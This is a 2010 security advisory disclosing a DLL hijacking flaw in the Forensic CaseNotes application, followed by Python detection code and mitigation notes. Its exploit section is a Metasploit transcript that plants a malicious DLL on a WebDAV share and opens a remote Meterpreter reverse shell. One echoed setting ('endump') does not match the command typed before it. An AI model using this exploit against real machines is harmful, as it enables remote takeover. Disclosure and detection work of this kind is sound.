Advisory: Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)

---------------------------------------------
Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- Forensic CaseNotes Description

The purpose of CaseNotes is to provide a single lightweight application program to run on the Microsoft Windows platform to allow forensic analysts and examiners of any discipline to securely record their contemporaneous notes electronically.

- Insecure Library Loading Allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework's webdav_dll_hijacker module with the following option: "set EXTENSIONS notes" (the module generates files with this extension on its WebDAV share; opening one with CaseNotes triggers the insecure library load).

For more vulnerability details please check the links in the reference section.

- Affected Versions

1.0.2007.8/1.3.2010.6 - other releases may also be affected.

- Solution

It is not known if there are fixed releases available.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

http://www.qccis.com/forensic-tools
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories

- Exploit example

msf exploit(webdav_dll_hijacker) > set EXTENSIONS notes
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  notes            yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.

<snip>

[*] 10.8.28.55:49194 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49194 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49194 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49194 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49194 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49194 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 2 opened (10.8.28.9:4444 -> 10.8.28.55:49200) at Sun Aug 29 20:43:39 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: m1k3-Vista\m1k3
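The transcript above shows the tell-tale signature of this vulnerability class from the defender's side: a DLL with a Windows system name (credssp.dll) being requested from the WebDAV share that the opened .notes document came from, rather than from System32. The following detection logic is an added example for this advisory, not code from the advisory author or from the CaseNotes project. It assumes Sysmon-style ImageLoad events flattened to one "Key: value, Key: value" line each; the sample lines, the KNOWN_SYSTEM_DLLS set and the CaseNotes install path are constructed for the demo.

```python
"""Detection of DLL search-order hijacking from image-load telemetry.

Added example for this advisory; it is not code from the advisory author or
from the CaseNotes project. It assumes Sysmon-style ImageLoad events
flattened to one 'Key: value, Key: value' line each; the sample lines below
are constructed and reuse the credssp.dll probe seen in the exploit transcript.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Directories where a Windows system DLL is expected to live (lower-case).
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
)

# Names that should only ever resolve from TRUSTED_DIRS. Constructed here;
# in practice build it from an inventory of the System32 directory.
KNOWN_SYSTEM_DLLS = {"credssp.dll"}

# A DLL path starting with \\host\ is a UNC share or a WebDAV mapping
# (Windows also renders WebDAV as \\host@80\share or \\host@SSL\share).
REMOTE_RE = re.compile(r"^\\\\[^\\]+\\")


@dataclass
class Finding:
    process: str
    dll: str
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key: value, Key: value' into a dict.

    partition() on ': ' keeps drive letters intact: 'C:\\x' has no space
    after its colon, so the first 'colon space' is the key separator.
    """
    fields = {}
    for part in line.split(", "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def analyse(fields: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding for one ImageLoad event, or None if it looks benign."""
    image = fields.get("Image", "")
    loaded = fields.get("ImageLoaded", "")
    signed = fields.get("Signed", "").lower() == "true"
    name = ntpath.basename(loaded).lower()
    dll_dir = ntpath.dirname(loaded).lower()
    app_dir = ntpath.dirname(image).lower()

    # Rule 1: no legitimate system or application DLL is fetched over the network.
    if REMOTE_RE.match(loaded):
        return Finding(image, loaded, "DLL loaded from a remote UNC/WebDAV path")
    # Rule 2: a system DLL name resolved outside a system directory is the
    # classic search-order hijack (a copy planted next to the opened document).
    if name in KNOWN_SYSTEM_DLLS and dll_dir not in TRUSTED_DIRS:
        return Finding(image, loaded, "system DLL name resolved outside a system directory")
    # Rule 3: anything unsigned outside both the app's own directory and the
    # system directories (e.g. the current working directory) is suspicious.
    if not signed and dll_dir != app_dir and dll_dir not in TRUSTED_DIRS:
        return Finding(image, loaded, "unsigned DLL loaded from an untrusted directory")
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Run every line through parse_event/analyse and collect the findings."""
    findings = []
    for line in lines:
        finding = analyse(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real captured events).
SAMPLE_EVENTS = [
    # benign: credssp.dll from System32
    r"Image: C:\Program Files\CaseNotes\CaseNotes.exe, ImageLoaded: C:\Windows\System32\credssp.dll, Signed: true",
    # benign: the application's own unsigned helper from its install directory
    r"Image: C:\Program Files\CaseNotes\CaseNotes.exe, ImageLoaded: C:\Program Files\CaseNotes\Helper.dll, Signed: false",
    # hijack: credssp.dll resolved from the WebDAV share the .notes file was opened from
    r"Image: C:\Program Files\CaseNotes\CaseNotes.exe, ImageLoaded: \\10.8.28.9\documents\credssp.dll, Signed: false",
    # hijack: the same DLL name planted beside a document in a local folder
    r"Image: C:\Program Files\CaseNotes\CaseNotes.exe, ImageLoaded: C:\Users\analyst\Documents\credssp.dll, Signed: false",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.process}: {f.dll} -> {f.reason}")
```

Running the block flags the two hijack events and passes the two benign ones. On the mitigation side, the Microsoft advisory linked in the reference section describes the CWDIllegalInDllSearch registry value, which stops the loader from searching the current working directory for DLLs, most usefully when that directory is a WebDAV or UNC share as in the transcript above; the application itself can also avoid the problem by restricting its search path (SetDllDirectory or a fully qualified LoadLibrary path).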